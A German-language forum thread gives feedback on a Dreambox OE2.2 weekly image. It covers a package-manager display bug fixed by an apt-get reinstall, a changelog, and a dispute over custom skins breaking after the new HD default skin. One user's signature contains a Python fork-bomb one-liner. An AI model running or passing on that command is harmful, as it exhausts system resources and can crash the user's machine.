Angepinnt OE2.2: Rückmeldungen zum Weekly Image für DM520/DM525/DM820/DM7080

• nixkoenner schrieb:

machmal folgendes

telnet boxip
      up

und poste hier die ausgabe

So F1 zu Ende, der Grill kühlt auch langsam wieder ab, jetzt ist Zeit.

Noch eine Anmerkung, die ältere EMC-Version habe auf hold gesetzt, da ich sonst mit meinen Einstellungen immer die *.cuts.ts.ts bekomme.
      Bild 1 zeigt das Update, Bild 2 den Paketmanager nach dem Booten.
      Bilder
      • screenshot1.jpg

699,43 kB, 1.078×1.061, 216 mal angesehen
      • screenshot2.jpg

231,71 kB, 1.920×1.080, 231 mal angesehen
    • Ich habe heute die 7080 wieder upgedatet und gebootet. Das Update läuft auch ganz normal durch. Trotzdem zeigt mir der Paketmanager immer noch viele Pakete als "Aktualisierbar"an, obwohl die Pakete richtig aktualisiert worden sind. Am Datum des "enigma2-plugin-extensions-piconmanager_1.0git20160712-r0.0" ist zu sehen, dass das heutige Plugin richtig installiert wurde, jedoch trotzdem als aktualisierbar angezeigt wird.
      Ein "opkg list upgradable" in telnet zeigt garkeine Pakete an, das "List upgradabel" im WebIF zeigt nur das auf hold gesetzte EMC.

Kann ich den Paketmanager löschen und neu installieren? Oder wie lautet der Befehl für Reinstallation?

PS: Alles gut :cool23: :freu:

Selbst ist der Mann. mit

Quellcode

1. *****************************
      2. * http://www.newnigma2.to *
      3. *****************************
      4. * the next step is done *
      5. *****************************
      6. opendreambox 2.2.0 dm7080
      7. dm7080 login: root
      8. Password:
      9. root@dm7080:~# apt-get update
      10. Ign http://feed.newnigma2.to ./ InRelease
      11. Ign http://feed.newnigma2.to ./ InRelease
      12. Ign http://feed.newnigma2.to ./ InRelease
      13. Hit http://feed.newnigma2.to ./ Release.gpg
      14. Hit http://feed.newnigma2.to ./ Release.gpg
      15. Hit http://feed.newnigma2.to ./ Release.gpg
      16. Hit http://feed.newnigma2.to ./ Release
      17. Hit http://feed.newnigma2.to ./ Release
      18. Hit http://feed.newnigma2.to ./ Release
      19. Hit http://feed.newnigma2.to ./ Packages
      20. Hit http://feed.newnigma2.to ./ Packages
      21. Hit http://feed.newnigma2.to ./ Packages
      22. Reading package lists... Done
      23. root@dm7080:~# apt-get --reinstall install enigma2-plugin-newnigma2-paketmanager
      24. Reading package lists... Done
      25. Building dependency tree
      26. Reading state information... Done
      27. 0 upgraded, 0 newly installed, 1 reinstalled, 0 to remove and 1 not upgraded.
      28. Need to get 31,8 kB of archives.
      29. After this operation, 0 B of additional disk space will be used.
      30. Get:1 http://feed.newnigma2.to/daily/deb/mips32el/ ./ enigma2-plugin-newnigma2-paketmanager 1.0git20160712-r0.0 [31,8 kB]
      31. Fetched 31,8 kB in 0s (521 kB/s)
      32. (Reading database ... 14512 files and directories currently installed.)
      33. Preparing to unpack .../enigma2-plugin-newnigma2-paketmanager_1.0git20160712-r0.0_mipsel.deb ...
      34. Unpacking enigma2-plugin-newnigma2-paketmanager (1.0git20160712-r0.0) over (1.0git20160712-r0.0) ...
      35. root@dm7080:~#
      Alles anzeigen

wurde das Problem gelöst (Bild 2 zeigt die selben Pakete von heute Morgen). Keine Ahnung, was da beim Paketmanager falsch installiert war.
      Bilder
      • screenshot.jpg

173,4 kB, 1.920×1.080, 219 mal angesehen
      • screenshot-reinstall.jpg

183,57 kB, 1.920×1.080, 195 mal angesehen

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Griffel ()

• Kann der Paketmanager nichts dafür denn es ist nur eine gui für apt wenn apt sagt update verfügbar dann ist der fehler dort zu suchen da hilft ein reinstallieren auch nicht.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Naja, das update funktionierte ja, nach dem reboot installierte "up" keine Pakete, "opkg list upgradable" zeigte keine Pakete zum Upgraden und im WebAdmin des WebIF wurde auch alles richtig angezeigt, daraus schliesse ich, dass mein apt-System OK ist.
      Nur im Paketmanager wurden manche installierten Pakete als "Aktualisierbar" angezeigt, was ja jetzt nach Reinstallation behoben ist.

Für mich ist damit alles gut. Sollte noch Bedarf bestehen, dem Problem auf den Grud zu gehen, ich habe heute vorsichtshalber vor der Reinstallation ein Komplett-Update gemacht. Ich könnte also noch nachschauen, welche Dateien wo waren.
    • feeds wurden gerade nochmal neugebaut, mit den aktuellen änderungen:

Quellcode

1. 4.3.0r10
      2. - added dm520 support
      3. - replaced old SD skin with new default HD skin
      4. - show up to 5 tuners in About Screen
      5. - getNextRecordingTime/getNextZapTime must ignore already running timers
      6. (used for automatic wakeup from deepstandby)
      7. - fixed SNRdb calculation for CXD1981 in DVB-T mode
      8. - fixed call of external cable scan helper tool
      Probleme kann man niemals mit derselben Denkweise lösen.

¯\_(ツ)_/¯

"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • - replaced old SD skin with new default HD Skin

irgendwie fehlt mir seit dem Update das Mute-Symbol in meinem Skin. Neuer Spinner ist auch da durch das Update auf den Default HD Skin. Na toll, da freuen sich ja wieder alle Skinner über neue Arbeit. Screens wie die Kanalsuche, Speichergeräte, Sprache müssen jetzt auch angepasst werden.

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Hilfsbereit ()

• Was meckert ihr denn da wieder rum ,seit froh das endlich mal das System richtig überarbeitet wird.
      Und was das Mute-Symbol angeht das ist immernoch da wo es mal war ,es hat sich einfach nur die Größe geändert und das aussehen ,daher keine Ahnung was du da in deinem skin gemacht hast.
      Und keine Ahnung was du mit den anderen screens meinst ich weiß ja nicht was du da wie von dem alten system_default Ordner in deinem skin drinb hattest.
      Ihr solltet nicht immer meckern sondern froh sein das DMM nach so vielen Jahren auch Systemmässig moderner werden möchte und da muss halt auch umgebaut werden und denkt ihr nicht das da auch viel Zeit investiert wird ? daher wenn ihr skins baut nutzt doch eigene buttons ,icons usw. dann hättet ihr da auch weniger Probleme wenn sich mal default was ändert.
      Bilder
      • 13.07.2016 - 06.42 - Aktueller Stream .jpg

69,14 kB, 1.280×720, 219 mal angesehen
      • Unbenannt.png

52,26 kB, 719×886, 200 mal angesehen
      Dreambox Two:
      AIO mit GP4.2 + GPT
      Dreambox one:
      AIO mit GP4.2
    • im neuen Standard-Skin ist das Mute-Symbol ja auch da, genauso wie der neue Spinner, alles getestet. Wie der neue HD-Skin aussieht, weiß ich auch, und dass das Mute Symbol noch da ist auch. Wenn ich scharf auf den DMM Standard-Skin wäre, würde ich ihn auch nutzen. Aber ich nutze eben einen anderen Skin, und da wird jetzt eben nicht mehr alles angezeigt. Und da verhalten sich meine getesteten Skins hier vom Feed auch noch unterschiedlich.Außerdem weiß ich im Moment garnicht, warum du dich da gerade angegriffen fühlst? ?( . Du hast ja jetzt nicht die Arbeit, Skins auf die neue Struktur an zu passen. Wenn dein Skin schon funktioniert, ist ja alles gut. Ich sehe schon die vielen neuen Threads hier, welche Skins jetzt nicht mehr richtig funktionieren und die Frage, wer kann das bitte fixen. Kaum einer will auf seinen geliebten Skin verzichten, und nicht jeder kann Skins anpassen. Meldungen gab es ja gestern schon im IHAD, dass es hier und da hakt. Schlafe doch jetzt einfach noch etwas, dann siehst du das Ganze nicht als gemecker an, sondern als Hinweis, was nach dem Update jetzt nicht mehr miteinander harmoniert und eventuell angepasst werden muss. Skins sind extra für Images designt oder einfach nur fix vom OE2.0 auf OE2.2 angepasst/portiert worden. Bei vielen konnte man froh sein, dass sich da überhaupt noch jemand darum gekümmert hat, VIELEN DANK UNTER ANDEREM DA AUCH AN deepblue2000. Wenn du jetzt Zeit und Lust hast, kannst du ja jetzt einige Skins testen und gleich die Anpassungen machen, damit nicht alles an wenigen Leuten hängen bleibt ;). Ich schaue mir das im Laufe des Tages auch noch mal genauer an, vielleicht kann ich mit meinen bescheidenen Mitteln auch das Eine oder Andere in meinem genutzen Skin anpassen. Hier ist nun mal das NN2 Board mit seinen Skins, selbst am GP3 mußte ja etwas angepasst werden, wie du gestern ja im IHAD geschrieben hast. So, nun ran an die Arbeit, bzw. abwarten was kommt, wenn noch mehr upgedatet haben ;).

Gruß

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Hilfsbereit ()

• Na sagen wir mal so die Arbeit hatte ich schon :D denn der neue systemdefault ist eine Teamarbeit von uns und da ich ihn mit gebaut habe weiß ich genau wovon ich rede und fühle mich da auch angesprochen.
      Und nocheinmal wenn ihr Dateien aus dem system default in euren Skins einsetzt dann kann es ebenda passieren das Dinge nach einem Umbau anderst sind ,wenn ihr das nicht wollt baut doch eure Skins unabhängig davon dann passiert das nicht.
      Das mute hat sich wie gesagt da nur in der Form geändert und sollte über all gehen nur halt eventuell bei fehlenden Anpassungen ein wenig komisch aussehen.
      Es wurde systemseitig halt jetzt auf HD umgebaut und SD entfernt und da hat man auch mal Anpassungen zu machen .
      Aber ohne solche Änderungen kann man auch das System nicht modernisieren und das ist aber das Ziel. ;)
      Dreambox Two:
      AIO mit GP4.2 + GPT
      Dreambox one:
      AIO mit GP4.2
    • ... bei solchen Änderungen merkt man eben erst richtig, wo etwas nicht ganz perfekt angepasst, oder nur der "einfache" Weg gegangen wurde ;). Ich schaue jetzt noch etwas nach, was in meinem genutzen Skin fehlt, vergleiche dies mit dem default-Skin, und versuch das noch einzubauen. Mute habe ich schon wieder herbeigezaubert, jetzt gehts z.B. an die Screens zur Kanalsuche, wie Tuner-Konfig, Satfinder usw. :D.
    • PS .und schau mal in die aktuellen git's dort siehst das wir zb. sehr viele Plugins oder system Plugins umgebaut und modernisiert haben ,wer glaubste denn hat da die Arbeit gehabt die letzten Monate?
      Genau deshalb finde ich es schon unschön wenn man sich aufregt das mal was nicht geht weil sich halt auch mal was ändert .
      Wie gesagt jeder kann seine Skins auch so bauen das sie unabhängig sind .
      Dreambox Two:
      AIO mit GP4.2 + GPT
      Dreambox one:
      AIO mit GP4.2
    • ... mir ist schon klar, dass DMM jetzt keine Betriebsferien macht und sich in der Zwischenzeit sich eine Menge unter der Haube tut. Beruhige dich wieder, und sehe nicht jede Meldung die jetzt kommt, als "Meckerei" an. Der neue HD-Skin sieht ja auf jeden Fall schon mal besser aus, als der in die Jahre gekommene SD-Skin. Hier geht es aber um Rückmeldung von Fehlern zum NN2 Daily Image und alles was damit zu tun hat. Skins sind ein wesentlicher Bestandteil davon, und ich will nicht wissen, wie viele User hier wirklich den DMM Standard-Skin genutzt haben, außer für die Grobeinstellungen ;). Ich erstelle selber auch keine Skins und bin darauf angewiesen jemanden zu fragen, wenn ich selber nicht mehr weiter komme. Das ist bei mir eher ein copy/paste Prinzip und dann schauen, was sich verändert hat ;).
    • Also eine Linuxbox ist und war schon immer eine Bastelbox in jeglichen Bereich.
      Und was man nicht vergessen darf das dieses auch nur ein Hobby ist ,daher gibt es keine Erwartungshaltung .
      Wenn einer einen anderen Skin benutzt als den Defauktskin ,dann muss man halt damit rechnen das nach Neuerungen mal was nicht geht .
      Und man kann nicht verlangen das der Fremdskinersteller diesen Fix ,denn das liegt in seinem ermessen ob er dieses macht oder nicht macht ,wie gesagt alles nur ein Hobby :)

Ich rein persönlich verhalte mich wie zombi ,selbst ist der Mann :)
      Und ein [ ich kann das nicht ] zählt bei mir nicht ,ich konnte das auch nicht ,und habe mir die Mühe gemacht mich darin einzuarbeiten :)
      Ein freundlicher Screm
    • Ich persönlich setze mich ja auch in meiner Freizeit hin, und versuche das Eine oder Andere, um nicht als "Bettler" dastehen zu müssen. Manches klappt, bei anderen Sachen muss ich eben doch mal nachfragen. Ich könnte mir das jetzt auch total einfach machen und warten, bis sich einer um den fehlerhaften Skin kümmert, aber so bin ich halt nicht. @SCREM, du kannst auch Programme für Windows schreiben? :D
    • Hilfsbereit schrieb:

@SCREM, du kannst auch Programme für Windows schreiben? :D

Ist nicht mein Aufgabenbereich ,und brauche ich nicht ,daher brauch ich da auch keine Zeit dafür investieren :)
      Aber davon abgesehen läuft mein Windows perfekt [ Auskennen sollte man sich damit schon ] .

Ich setzte grundsätzlich nur meine Zeit ein für Sachen die mich rein persönlich Interessieren ,wie zum Beispiel meine Hobbys :)
      Ein freundlicher Screm
    • Die Frage war ja nicht, ob das dein Aufgabenbereich ist oder du dafür Zeit aufwenden willst ;). Wenn es halt mal durch eine Änderung von MS nicht mehr perfekt läuft, kannst du es aber auch nicht selbst fixen, denke ich mal. Würdest du da nicht auch sagen, "ich kann das nicht" ? *fg* Aber egal, das wird sonst zu OT hier. Mal sehen was der Tag so bringt .........
    • Na ja zum Schluss muss ich dazu noch sagen das durch den Änderungen der Default Skin ja noch funktioniert soweit ich das hier gelesen habe.
      Und für Fremdskins ist DMM oder wer auch immer nicht zuständig.
      Man sollte halt Birnen nicht mit Äpfeln vergleichen :)
      Mehr gibt es nicht dazu zu sagen :)
      Ein freundlicher Screm